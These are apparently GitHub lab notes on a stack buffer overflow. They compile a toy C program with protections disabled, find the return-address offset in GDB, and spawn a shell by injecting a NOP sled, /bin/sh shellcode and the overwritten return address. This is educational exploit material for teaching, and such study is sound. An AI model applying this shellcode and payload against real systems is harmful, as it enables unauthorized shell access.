You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
gcc -o example -fno-stack-protector -m32 -z execstack example.c
#-fno-stack-protector === Removes the canary value at the end of the buffer#-m32 === Sets the program to compile into a 32 bit program#-z execstack === Makes the stack executable
Using GDB Debugger
gdb ./example
#Assembly language instructiions
disas main
#Creating breakpoint to analyse the programbreak*0x08048475
#Using python command to use the buffer
run $(python -c "print('A'*256)")#looking into the memory
x/200xb $esp# Here first "x" means examine, 200xb is the memory area in hexadecimal byte that we want to see and $esp#stack pointer# note down the the starting point of buffer in memory 0xffffcef0, and then reverse it with command \xf0\xce\xff\xff#Using python command to make the buffer overflow
run $(python -c "print('A'*260)")
run $(python -c "print('A'*264)")
run $(python -c "print('A'*268)")# we overwrote the base pointer which was pointing to something but not the return address
run $(python -c "print('A'*272)")#double check using 'B' to get 42 in hexadecimal
run $(python -c "print('A'*268+'BBBB')")
Launching a buffer overflow attack
# shell code \x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"# to get access into the shell
run $(python -c "print('\x90'*222+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\xf0\xce\xff\xff')")
